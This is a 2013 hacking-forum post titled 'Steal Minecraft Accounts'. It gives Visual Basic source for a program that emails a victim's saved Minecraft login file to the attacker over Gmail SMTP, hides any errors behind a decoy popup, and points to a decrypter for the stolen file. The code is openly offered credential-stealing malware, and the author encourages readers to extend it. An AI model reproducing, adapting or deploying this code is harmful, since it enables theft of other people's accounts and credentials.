Login Register






The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average


Tutorial Steal Minecraft Accounts filter_list
Author
Message
Steal Minecraft Accounts #1
Hey guys, I came up with this method around 6 months ago, and never thought to improve/share it, so here it is.

What It Is:
It copies the .minecraft/lastlogin file and emails it to your own email address via SMTP.

How It's Done:
I created this very basic 'program' in VB a while ago, It should be fairly easy to convert it into another language, or integrate this into another program.

Let's Make this thing!
Due to the lastlogin file being encrypted, you can use this program to 'decrypt' it.
WARNING: This will only work if they have the 'Remember Password' option ticked.
lastlogin decrypter: Download
VB Code:
Code:
Imports System.Net.Mail
Public Class Form1
    Dim smtp As New SmtpClient
    Dim mail As New MailMessage


    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click

        Dim MyMailMessage As New MailMessage()
        Try
            Dim Attch As Net.Mail.Attachment = New Net.Mail.Attachment(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\.minecraft\lastlogin")
            MyMailMessage.Attachments.Add(Attch)
            MyMailMessage.From = New MailAddress("senderaddress@gmail.com")
            MyMailMessage.To.Add("receiveraddress@googlemail.com")
            MyMailMessage.Subject = ("Last Login File")
            MyMailMessage.Body = (" ")
            Dim SMTP As New SmtpClient("smtp.gmail.com")
            SMTP.Port = 587
            SMTP.EnableSsl = True
            SMTP.Credentials = New System.Net.NetworkCredential("senderaddress@gmail.com", "senderpassword")
            SMTP.Send(MyMailMessage)
        Catch ex As Exception
        End Try
        MsgBox("Popup after button press.")
    End Sub

    Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

    End Sub
End Class

I hope you can take this and develop off of it, If you need any help just comment, I may work on this and try to expand and improve on it.
Peace!

Reply





Messages In This Thread
Steal Minecraft Accounts - by lux - 04-28-2013, 01:19 AM
RE: Steal Minecraft Accounts - by Nefarious - 04-28-2013, 01:57 AM
RE: Steal Minecraft Accounts - by lux - 05-04-2013, 05:49 PM
RE: Steal Minecraft Accounts - by adriancs35 - 04-28-2013, 06:28 PM
RE: Steal Minecraft Accounts - by Nefarious - 04-29-2013, 12:35 AM
RE: Steal Minecraft Accounts - by ksocially - 10-14-2013, 08:23 PM
RE: Steal Minecraft Accounts - by lux - 10-14-2013, 08:24 PM
RE: Steal Minecraft Accounts - by ksocially - 10-14-2013, 09:37 PM
RE: Steal Minecraft Accounts - by Eclipse - 10-14-2013, 09:44 PM
RE: Steal Minecraft Accounts - by Mom - 10-14-2013, 09:48 PM
RE: Steal Minecraft Accounts - by lux - 10-14-2013, 11:22 PM
RE: Steal Minecraft Accounts - by DarkFlux™ - 10-20-2013, 01:45 PM



Users browsing this thread: 3 Guest(s)